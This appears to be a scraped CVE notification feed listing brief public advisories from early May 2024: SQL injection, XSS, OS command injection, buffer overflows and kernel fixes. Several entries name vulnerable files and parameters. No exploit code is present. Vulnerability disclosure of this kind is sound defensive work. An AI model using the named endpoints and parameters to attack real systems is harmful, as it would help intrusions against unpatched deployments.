🚨 CVE-2024-34367Cross-Site Request Forgery (CSRF) vulnerability in Popup Box Team Popup box allows Cross-Site Scripting (XSS).This issue affects Popup box: from n/a through 4.1.2.🎖@cveNotify |
|
| 2024-05-06 19:37:25 |
🚨 CVE-2024-33912Missing Authorization vulnerability in Academy LMS.This issue affects Academy LMS: from n/a through 1.9.16.🎖@cveNotify |
|
| 2024-05-06 19:37:24 |
🚨 CVE-2024-33910Missing Authorization vulnerability in Supsystic Digital Publications by Supsystic.This issue affects Digital Publications by Supsystic: from n/a through 1.7.7.🎖@cveNotify |
|
| 2024-05-06 18:37:37 |
🚨 CVE-2024-34388Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Scribit GDPR Compliance.This issue affects GDPR Compliance: from n/a through 1.2.5.🎖@cveNotify |
|
| 2024-05-06 18:37:36 |
🚨 CVE-2024-34382Exposure of Sensitive Information to an Unauthorized Actor vulnerability in RoboSoft Robo Gallery.This issue affects Robo Gallery: from n/a through 3.2.18.🎖@cveNotify |
|
| 2024-05-06 18:37:32 |
🚨 CVE-2024-33411A SQL injection vulnerability in /model/get_admin_profile.php in Campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the my_index parameter.🎖@cveNotify |
|
| 2024-05-06 18:37:31 |
🚨 CVE-2024-33409SQL injection vulnerability in index.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the name parameter.🎖@cveNotify |
|
| 2024-05-06 18:37:30 |
🚨 CVE-2024-33407SQL injection vulnerability in /model/delete_record.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-05-06 18:37:26 |
🚨 CVE-2024-33405SQL injection vulnerability in add_friends.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the friend_index parameter.🎖@cveNotify |
|
| 2024-05-06 18:37:25 |
🚨 CVE-2024-33403A SQL injection vulnerability in /model/get_events.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the event_id parameter.🎖@cveNotify |
|
| 2024-05-06 18:37:24 |
🚨 CVE-2024-32807Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Brevo for WooCommerce Sendinblue for WooCommerce.This issue affects Sendinblue for WooCommerce: from n/a through 4.0.17.🎖@cveNotify |
|
| 2024-05-06 16:37:32 |
🚨 CVE-2024-34251An out-of-bound memory read vulnerability was discovered in Bytecode Alliance wasm-micro-runtime v2.0.0 which allows a remote attacker to cause a denial of service via the "block_type_get_arity" function in core/iwasm/interpreter/wasm.h.🎖@cveNotify |
|
| 2024-05-06 16:37:31 |
🚨 CVE-2024-34246wasm3 v0.5.0 was discovered to contain an out-of-bound memory read which leads to segmentation fault via the function "main" in wasm3/platforms/app/main.c.🎖@cveNotify |
|
| 2024-05-06 16:37:30 |
🚨 CVE-2024-34093An issue was discovered in Archer Platform 6 before 2024.03. There is an X-Forwarded-For Header Bypass vulnerability. An unauthenticated attacker could potentially bypass intended whitelisting when X-Forwarded-For header is enabled.🎖@cveNotify |
|
| 2024-05-06 16:37:26 |
🚨 CVE-2024-34091An issue was discovered in Archer Platform 6 before 2024.04. There is a stored cross-site scripting (XSS) vulnerability. A remote authenticated malicious Archer user could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed in the background of the application and renders content inaccessible. 6.14 P3 (6.14.0.3) is also a fixed release.🎖@cveNotify |
|
| 2024-05-06 16:37:25 |
🚨 CVE-2024-34089An issue was discovered in Archer Platform 6 before 2024.04. There is a stored cross-site scripting (XSS) vulnerability. A remote authenticated malicious Archer user could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 P3 (6.14.0.3) is also a fixed release.🎖@cveNotify |
|
| 2024-05-06 16:37:24 |
🚨 CVE-2024-26312Archer Platform 6 before 2024.03 contains a sensitive information disclosure vulnerability. An authenticated attacker could potentially obtain access to sensitive information via a popup warning message.🎖@cveNotify |
|
| 2024-05-06 16:07:44 |
🚨 CVE-2024-21474Memory corruption when size of buffer from previous call is used without validation or re-initialization.🎖@cveNotify |
|
| 2024-05-06 16:07:43 |
🚨 CVE-2023-43531Memory corruption while verifying the serialized header when the key pairs are generated.🎖@cveNotify |
|
| 2024-05-06 16:07:42 |
🚨 CVE-2023-43529Transient DOS while processing IKEv2 Informational request messages, when a malformed fragment packet is received.🎖@cveNotify |
|
| 2024-05-06 16:07:38 |
🚨 CVE-2023-43528Information disclosure when the ADSP payload size received in HLOS in response to Audio Stream Manager matrix session is less than this expected size.🎖@cveNotify |
|
| 2024-05-06 16:07:37 |
🚨 CVE-2023-43526Memory corruption while querying module parameters from Listen Sound model client in kernel from user space.🎖@cveNotify |
|
| 2024-05-06 16:07:36 |
🚨 CVE-2023-43524Memory corruption when the bandpass filter order received from AHAL is not within the expected range.🎖@cveNotify |
|
| 2024-05-06 13:37:25 |
🚨 CVE-2024-33788Linksys E5600 v1.1.0.26 was discovered to contain a command injection vulnerability via the PinCode parameter at /API/info form endpoint.🎖@cveNotify |
|
| 2024-05-06 13:37:24 |
🚨 CVE-2024-33749DedeCMS V5.7.114 is vulnerable to deletion of any file via mail_file_manage.php.🎖@cveNotify |
|
| 2024-05-06 13:07:31 |
🚨 CVE-2022-48701In the Linux kernel, the following vulnerability has been resolved:ALSA: usb-audio: Fix an out-of-bounds bug in __snd_usb_parse_audio_interface()There may be a bad USB audio device with a USB ID of (0x04fa, 0x4201) andthe number of it's interfaces less than 4, an out-of-bounds read bug occurswhen parsing the interface descriptor for this device.Fix this by checking the number of interfaces.🎖@cveNotify |
|
| 2024-05-06 13:07:27 |
🚨 CVE-2022-48700In the Linux kernel, the following vulnerability has been resolved:vfio/type1: Unpin zero pagesThere's currently a reference count leak on the zero page. We incrementthe reference via pin_user_pages_remote(), but the page is later handledas an invalid/reserved page, therefore it's not accounted against theuser and not unpinned by our put_pfn().Introducing special zero page handling in put_pfn() would resolve theleak, but without accounting of the zero page, a single user couldstill create enough mappings to generate a reference count overflow.The zero page is always resident, so for our purposes there's no reasonto keep it pinned. Therefore, add a loop to walk pages returned frompin_user_pages_remote() and unpin any zero pages.🎖@cveNotify |
|
| 2024-05-06 13:07:26 |
🚨 CVE-2022-48698In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: fix memory leak when using debugfs_lookup()When calling debugfs_lookup() the result must have dput() called on it,otherwise the memory will leak over time. Fix this up by properlycalling dput().🎖@cveNotify |
|
| 2024-05-06 13:07:25 |
🚨 CVE-2022-48696In the Linux kernel, the following vulnerability has been resolved:regmap: spi: Reserve space for register address/paddingCurrently the max_raw_read and max_raw_write limits in regmap_spi structdo not take into account the additional size of the transmitted registeraddress and padding. This may result in exceeding the maximum permittedSPI message size, which could cause undefined behaviour, e.g. datacorruption.Fix regmap_get_spi_bus() to properly adjust the above mentioned limitsby reserving space for the register address/padding as set in the regmapconfiguration.🎖@cveNotify |
|
| 2024-05-06 12:37:31 |
🚨 CVE-2024-3576The NPort 5100A Series prior to version 1.6 is affected by web server XSS vulnerability. The vulnerability is caused by not correctly neutralizing user-controllable input before placing it in output. Malicious users may use the vulnerability to get sensitive information and escalate privileges.🎖@cveNotify |
|
| 2024-05-06 12:37:30 |
🚨 CVE-2024-33753Section Camera V2.5.5.3116-S50-SMA-B20160811 and earlier versions allow the accounts and passwords of administrators and users to be changed without authorization.🎖@cveNotify |
|
| 2024-05-06 12:37:26 |
🚨 CVE-2023-49675An unauthenticated local attacker may trick a user to open corrupted project files to execute arbitrary code or crash the system due to an out-of-bounds write vulnerability.🎖@cveNotify |
|
| 2024-05-06 12:37:25 |
🚨 CVE-2024-34403An issue was discovered in uriparser through 0.9.7. ComposeQueryMallocExMm in UriQuery.c has an integer overflow via a long string.🎖@cveNotify |
|
| 2024-05-06 12:37:24 |
🚨 CVE-2024-34402An issue was discovered in uriparser through 0.9.7. ComposeQueryEngine in UriQuery.c has an integer overflow via long keys or values, with a resultant buffer overflow.🎖@cveNotify |
|
| 2024-05-06 11:37:27 |
🚨 CVE-2024-34403An issue was discovered in uriparser through 0.9.7. ComposeQueryMallocExMm in UriQuery.c has an integer overflow via a long string.🎖@cveNotify |
|
| 2024-05-06 11:37:26 |
🚨 CVE-2024-34402An issue was discovered in uriparser through 0.9.7. ComposeQueryEngine in UriQuery.c has an integer overflow via long keys or values, with a resultant buffer overflow.🎖@cveNotify |
|
| 2024-05-06 07:37:26 |
🚨 CVE-2024-23193E-Mails exported as PDF were stored in a cache that did not consider specific session information for the related user account. Users of the same service node could access other users E-Mails in case they were exported as PDF for a brief moment until caches were cleared. Successful exploitation requires good timing and modification of multiple request parameters. Please deploy the provided updates and patch releases. The cache for PDF exports now takes user session information into consideration when performing authorization decisions. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-06 07:37:25 |
🚨 CVE-2024-23187Content-ID based embedding of resources in E-Mails could be abused to trigger client-side script code when using the "show more" option. Attackers could perform malicious API requests or extract information from the users account. Exploiting the vulnerability requires user interaction. Please deploy the provided updates and patch releases. CID replacement has been hardened to omit invalid identifiers. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-06 07:37:24 |
🚨 CVE-2024-23186E-Mail containing malicious display-name information could trigger client-side script execution when using specific mobile devices. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. We now use safer methods of handling external content when embedding displayname information to the web interface. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-06 06:37:31 |
🚨 CVE-2024-4527A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /view/student_payment_details2.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263130 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-06 06:37:30 |
🚨 CVE-2024-4525A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /view/student_payment_details4.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263128.🎖@cveNotify |
|
| 2024-05-06 06:37:26 |
🚨 CVE-2024-3756The MF Gig Calendar WordPress plugin through 1.2.1 does not have CSRF checks in some places, which could allow attackers to make logged in Contributors and above delete arbitrary events via a CSRF attack🎖@cveNotify |
|
| 2024-05-06 06:37:25 |
🚨 CVE-2024-3752The Crelly Slider WordPress plugin through 1.4.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-06 06:37:24 |
🚨 CVE-2024-0904The Fancy Product Designer WordPress plugin before 6.1.81 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-06 05:37:25 |
🚨 CVE-2024-4522A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_salary_details.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263125 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-06 05:37:24 |
🚨 CVE-2024-4521A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/teacher_salary_details2.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263124.🎖@cveNotify |
|
| 2024-05-06 04:37:34 |
🚨 CVE-2024-4519A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /view/teacher_salary_details3.php. The manipulation of the argument month leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263123.🎖@cveNotify |
|
| 2024-05-06 04:37:33 |
🚨 CVE-2024-4518A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /view/teacher_salary_invoice.php. The manipulation of the argument desc leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263122 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-06 03:37:35 |
🚨 CVE-2024-4516A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /view/timetable.php. The manipulation of the argument grade leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263120.🎖@cveNotify |
|
| 2024-05-06 03:37:31 |
🚨 CVE-2024-20060In da, there is a possible escalation of privilege due to an incorrect status check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541749; Issue ID: ALPS08541754.🎖@cveNotify |
|
| 2024-05-06 03:37:30 |
🚨 CVE-2024-20058In keyInstall, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08580204; Issue ID: ALPS08580204.🎖@cveNotify |
|
| 2024-05-06 03:37:26 |
🚨 CVE-2024-20056In preloader, there is a possible escalation of privilege due to an insecure default value. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08528185; Issue ID: ALPS08528185.🎖@cveNotify |
|
| 2024-05-06 03:37:25 |
🚨 CVE-2023-32873In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08583919; Issue ID: ALPS08304227.🎖@cveNotify |
|
| 2024-05-06 03:37:24 |
🚨 CVE-2023-32871In DA, there is a possible permission bypass due to an incorrect status check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08355514; Issue ID: ALPS08355514.🎖@cveNotify |
|
| 2024-05-06 02:37:30 |
🚨 CVE-2024-4513A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/timetable_update_form.php. The manipulation of the argument grade leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263117 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-06 02:37:29 |
🚨 CVE-2024-4512A vulnerability classified as problematic was found in SourceCodester Prison Management System 1.0. This vulnerability affects unknown code of the file /Employee/edit-profile.php. The manipulation of the argument txtfullname/txtdob/txtaddress/txtqualification/cmddept/cmdemployeetype/txtappointment leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263116.🎖@cveNotify |
|
| 2024-05-06 01:37:25 |
🚨 CVE-2024-4509A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/IPV6/naborTable/add_commit.php. The manipulation of the argument ip_addr/mac_addr leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263113 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-06 01:37:24 |
🚨 CVE-2024-4508A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been classified as critical. Affected is an unknown function of the file /view/IPV6/ipv6StaticRoute/static_route_edit_ipv6.php. The manipulation of the argument oldipmask/oldgateway/olddevname leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263112. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-06 00:37:30 |
🚨 CVE-2024-4507A vulnerability was found in Ruijie RG-UAC up to 20240428 and classified as critical. This issue affects some unknown processing of the file /view/IPV6/ipv6StaticRoute/static_route_add_ipv6.php. The manipulation of the argument text_prefixlen/text_gateway/devname leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263111. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-06 00:37:27 |
🚨 CVE-2024-34529Nebari through 2024.4.1 prints the temporary Keycloak root password.🎖@cveNotify |
|
| 2024-05-06 00:37:26 |
🚨 CVE-2024-34527spaces_plugin/app.py in SolidUI 0.4.0 has an unnecessary print statement for an OpenAI key. The printed string might be logged.🎖@cveNotify |
|
| 2024-05-06 00:37:25 |
🚨 CVE-2024-34524In XLANG OpenAgents through fe73ac4, the allowed_file protection mechanism can be bypassed by using an incorrect file extension for the nature of the file content.🎖@cveNotify |
|
| 2024-05-05 23:37:25 |
🚨 CVE-2024-4505A vulnerability, which was classified as critical, was found in Ruijie RG-UAC up to 20240428. This affects an unknown part of the file /view/IPV6/ipv6Addr/ip_addr_add_commit.php. The manipulation of the argument prelen/ethname leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263109 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 23:37:24 |
🚨 CVE-2024-4504A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240428. Affected by this issue is some unknown functionality of the file /view/HAconfig/baseConfig/commit.php. The manipulation of the argument peer_ip/local_ip leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263108. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 22:37:27 |
🚨 CVE-2024-34519Avantra Server 24.x before 24.0.7 and 24.1.x before 24.1.1 mishandles the security of dashboards, aka XAN-5367. If a user can create a dashboard with an auto-login user, data disclosure may occur. Access control can be bypassed when there is a shared dashboard, and its auto-login user has privileges that a dashboard visitor should not have.🎖@cveNotify |
|
| 2024-05-05 22:37:26 |
🚨 CVE-2023-52723In KDE libksieve before 23.03.80, kmanagesieve/session.cpp places a cleartext password in server logs because a username variable is accidentally given a password value.🎖@cveNotify |
|
| 2024-05-05 21:37:24 |
🚨 CVE-2024-34515image-optimizer before 1.7.3 allows PHAR deserialization, e.g., the phar:// protocol in arguments to file_exists().🎖@cveNotify |
|
| 2024-05-05 20:37:27 |
🚨 CVE-2024-4501A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been rated as critical. This issue affects some unknown processing of the file /view/bugSolve/captureData/commit.php. The manipulation of the argument tcpDump leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263105 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 20:37:26 |
🚨 CVE-2024-34511Component Server in Gradio before 4.13 does not properly consider _is_server_fn for functions.🎖@cveNotify |
|
| 2024-05-05 20:37:25 |
🚨 CVE-2024-34508dcmnet in DCMTK before 3.6.9 has a segmentation fault via an invalid DIMSE message.🎖@cveNotify |
|
| 2024-05-05 19:37:26 |
🚨 CVE-2024-34506An issue was discovered in includes/specials/SpecialMovePage.php in MediaWiki before 1.39.7, 1.40.x before 1.40.3, and 1.41.x before 1.41.1. If a user with the necessary rights to move the page opens Special:MovePage for a page with tens of thousands of subpages, then the page will exceed the maximum request time, leading to a denial of service.🎖@cveNotify |
|
| 2024-05-05 19:37:25 |
🚨 CVE-2024-34502An issue was discovered in WikibaseLexeme in MediaWiki before 1.39.6, 1.40.x before 1.40.2, and 1.41.x before 1.41.1. Loading Special:MergeLexemes will (attempt to) make an edit that merges the from-id to the to-id, even if the request was not a POST request, and even if it does not contain an edit token.🎖@cveNotify |
|
| 2024-05-05 19:37:24 |
🚨 CVE-2024-34500An issue was discovered in the UnlinkedWikibase extension in MediaWiki before 1.39.6, 1.40.x before 1.40.2, and 1.41.x before 1.41.1. XSS can occur through an interface message. Error messages (in the $err var) are not escaped before being passed to Html::rawElement() in the getError() function in the Hooks class.🎖@cveNotify |
|
| 2024-05-05 18:37:24 |
🚨 CVE-2024-4500A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Employee/edit-photo.php. The manipulation of the argument userImage leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263104.🎖@cveNotify |
|
| 2024-05-05 16:37:25 |
🚨 CVE-2024-33309An issue in TVS Motor Company Limited TVS Connet Android v.4.5.1 and iOS v.5.0.0 allows a remote attacker to obtain sensitive information via an insecure API endpoint. NOTE: this is disputed as discussed in the msn-official/CVE-Evidence repository.🎖@cveNotify |
|
| 2024-05-05 16:37:24 |
🚨 CVE-2024-33308An issue in TVS Motor Company Limited TVS Connet Android v.4.5.1 and iOS v.5.0.0 allows a remote attacker to escalate privileges via the Emergency Contact Feature. NOTE: this is disputed as discussed in the msn-official/CVE-Evidence repository.🎖@cveNotify |
|
| 2024-05-05 15:37:27 |
🚨 CVE-2024-34474Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM.🎖@cveNotify |
|
| 2024-05-05 15:37:26 |
🚨 CVE-2024-23525The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.🎖@cveNotify |
|
| 2024-05-05 15:37:25 |
🚨 CVE-2024-22368The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells.🎖@cveNotify |
|
| 2024-05-05 15:37:24 |
🚨 CVE-2023-7101Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.🎖@cveNotify |
|
| 2024-05-05 07:37:24 |
🚨 CVE-2024-4497A vulnerability was found in Tenda i21 1.0.0.14(4656). It has been declared as critical. This vulnerability affects the function formexeCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263086 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 06:37:25 |
🚨 CVE-2024-4496A vulnerability was found in Tenda i21 1.0.0.14(4656). It has been classified as critical. This affects the function formWifiMacFilterSet. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263085 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 06:37:24 |
🚨 CVE-2024-4495A vulnerability was found in Tenda i21 1.0.0.14(4656) and classified as critical. Affected by this issue is the function formWifiMacFilterGet. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263084. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 05:37:25 |
🚨 CVE-2024-4494A vulnerability has been found in Tenda i21 1.0.0.14(4656) and classified as critical. Affected by this vulnerability is the function formSetUplinkInfo of the file /goform/setUplinkInfo. The manipulation of the argument pingHostIp2 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263083. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 03:37:31 |
🚨 CVE-2024-34490In Maxima through 5.47.0 before 51704c, the plotting facilities make use of predictable names under /tmp. Thus, the contents may be controlled by a local attacker who can create files in advance with these names. This affects, for example, plot2d.🎖@cveNotify |
|
| 2024-05-05 03:37:30 |
🚨 CVE-2024-34488OFPMultipartReply in parser.py in Faucet SDN Ryu 4.34 allows attackers to cause a denial of service (infinite loop) via b.length=0.🎖@cveNotify |
|
| 2024-05-05 03:37:26 |
🚨 CVE-2024-34486OFPPacketQueue in parser.py in Faucet SDN Ryu 4.34 allows attackers to cause a denial of service (infinite loop) via OFPQueueProp.len=0.🎖@cveNotify |
|
| 2024-05-05 03:37:25 |
🚨 CVE-2024-22391A heap-based buffer overflow vulnerability exists in the LookupTable::SetLUT functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-05 03:37:24 |
🚨 CVE-2024-22373An out-of-bounds write vulnerability exists in the JPEG2000Codec::DecodeByStreamsCommon functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted DICOM file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-05 02:37:25 |
🚨 CVE-2024-34484OFPBucket in parser.py in Faucet SDN Ryu 4.34 allows attackers to cause a denial of service (infinite loop) via action.len=0.🎖@cveNotify |
|
| 2024-05-05 02:37:24 |
🚨 CVE-2024-34483OFPGroupDescStats in parser.py in Faucet SDN Ryu 4.34 allows attackers to cause a denial of service (infinite loop) via OFPBucket.len=0.🎖@cveNotify |
|
| 2024-05-05 01:37:25 |
🚨 CVE-2024-4492A vulnerability, which was classified as critical, has been found in Tenda i21 1.0.0.14(4656). This issue affects the function formOfflineSet of the file /goform/setStaOffline. The manipulation of the argument GO/ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263081 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-05 01:37:24 |
🚨 CVE-2024-34478btcd before 0.24.0 does not correctly implement the consensus rules outlined in BIP 68 and BIP 112, making it susceptible to consensus failures. Specifically, it uses the transaction version as a signed integer when it is supposed to be treated as unsigned. There can be a chain split and loss of funds.🎖@cveNotify |
|
| 2024-05-05 00:37:29 |
🚨 CVE-2024-34475Open5GS before 2.7.1 is vulnerable to a reachable assertion that can cause an AMF crash via NAS messages from a UE: gmm_state_authentication in amf/gmm-sm.c for != OGS_ERROR.🎖@cveNotify |
|
| 2024-05-04 23:37:24 |
🚨 CVE-2024-34473An issue was discovered in appmgr in O-RAN Near-RT RIC I-Release. An attacker could register an unintended RMR message type during xApp registration to disrupt other service components.🎖@cveNotify |
|
| 2024-05-04 22:37:24 |
🚨 CVE-2023-52729TCPServer.cpp in SimpleNetwork through 29bc615 has an off-by-one error that causes a buffer overflow when trying to add '\0' to the end of long msg data. It can be exploited via crafted TCP packets.🎖@cveNotify |
|
| 2024-05-04 20:37:25 |
🚨 CVE-2024-34469Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save.🎖@cveNotify |
|
| 2024-05-04 20:37:24 |
🚨 CVE-2024-34467ThinkPHP 8.0.3 allows remote attackers to discover the PHPSESSION cookie because think_exception.tpl (aka the debug error output source code) provides this in an error message for a crafted URI in a GET request.🎖@cveNotify |
|
| 2024-05-04 19:37:24 |
🚨 CVE-2024-34462Alinto SOGo through 5.10.0 allows XSS during attachment preview.🎖@cveNotify |
|
| 2024-05-04 16:37:26 |
🚨 CVE-2023-39368Protection mechanism failure of bus lock regulator for some Intel(R) Processors may allow an unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2024-05-04 16:37:25 |
🚨 CVE-2023-28746Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2024-05-04 16:37:24 |
🚨 CVE-2023-22655Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-04 14:37:25 |
🚨 CVE-2023-27283IBM Aspera Orchestrator 4.0.1 could allow a remote attacker to enumerate usernames due to observable response discrepancies. IBM X-Force ID: 248545.🎖@cveNotify |
|
| 2024-05-04 14:37:24 |
🚨 CVE-2024-27268IBM WebSphere Application Server Liberty 18.0.0.2 through 24.0.0.3 is vulnerable to a denial of service, caused by sending a specially crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. IBM X-Force ID: 284574.🎖@cveNotify |
|
| 2024-05-04 08:37:25 |
🚨 CVE-2024-1050The Import and export users and customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_force_reset_password_delete_metas() function in all versions up to, and including, 1.26.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete all forced password resets.🎖@cveNotify |
|
| 2024-05-04 08:37:24 |
🚨 CVE-2023-7065The Stop Spammers Security | Block Spam Users, Comments, Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2024.4. This is due to missing or incorrect nonce validation on the sfs_process AJAX action. This makes it possible for unauthenticated attackers to add arbitrary IPs to the plugin's allowlist and blocklist via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-04 05:37:25 |
🚨 CVE-2024-34461Zenario before 9.5.60437 uses Twig filters insecurely in the Twig Snippet plugin, and in the site-wide HEAD and BODY elements, enabling code execution by a designer or an administrator.🎖@cveNotify |
|
| 2024-05-04 05:37:24 |
